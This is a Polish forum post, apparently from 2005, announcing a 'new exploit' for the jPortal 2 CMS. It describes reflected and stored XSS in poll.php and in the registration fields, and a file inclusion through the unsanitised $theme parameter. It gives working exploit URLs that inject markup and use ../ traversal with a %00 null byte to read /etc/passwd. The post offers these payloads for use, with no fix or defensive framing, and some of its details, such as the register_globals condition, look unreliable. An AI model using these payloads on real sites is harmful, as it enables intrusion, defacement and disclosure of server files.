Nowy Exploit - Jportal 2

zi4m

Użytkownik
Dołączył
Lipiec 29, 2005
Posty
3
witam ,

nie patrzyłem czy był już taki temat ale jest nowy exploit na jp..

Opis:

a)XSS

Problem dotyczy sondy a mianowicie pliku poll.php a dokładniej:
<code>
echo 'Wyniki głosowania'.$poll_err;
</code>
można przez url dodać swój kodzik js bądź
vb(Uwaga trzeba pamiętać aby wcześniej zmiennej
cmd przypisać jakąś wartośc najlepiej old)

XSS występuje także w rejestracji i wystarczy w kraju lub miejscowości dać jakiś kod html aby wywalić
póżniej ładnie wyglądający jportal i troszkę go zniekształcić
smile.gif


b)includ'owanie dowolnego pliku

Bug występuje w pliku index.php.Oto dokładny kod:
<code>
include("theme/$theme/index.php");
</code>

Bądź wcześniejsze wersje jportal-a:
<code>
include("theme/$theme/functions.inc.php");
</code>


Można tu podmienić zmienną $theme na odpowiednią wartość
<
Naprzykład tak aby odwołała się do /etc/passwd
i kasowała wszystko co ma za sobą(%00)

Exploit:

a)XSS:

http://www.witek.pl/jp/poll.php?cmd=old&am...amiana%3C/h1%3E
Da nam to piękny napis "Dupa Damiana"

b)dołączanie dowolnego index.php na servie:

http://www.witek.pl/jp/index.php?theme=../../
Da nam to dołączenie pliku http://www.dupa.pl/index.php.Bądż na starszych wersjach jportala plik
http://www.dupa.pl/index.php


c)przeczytanie dowolnego pliku na servie:
http://www.dupa.pl/jp/index.php?theme=../...../etc/passwd%00
Da nam to przeczytanie pliku /etc/passwd of course jeżeli register_globals jest off :)[/b]

Pozdrawiam .
 
Do góry Bottom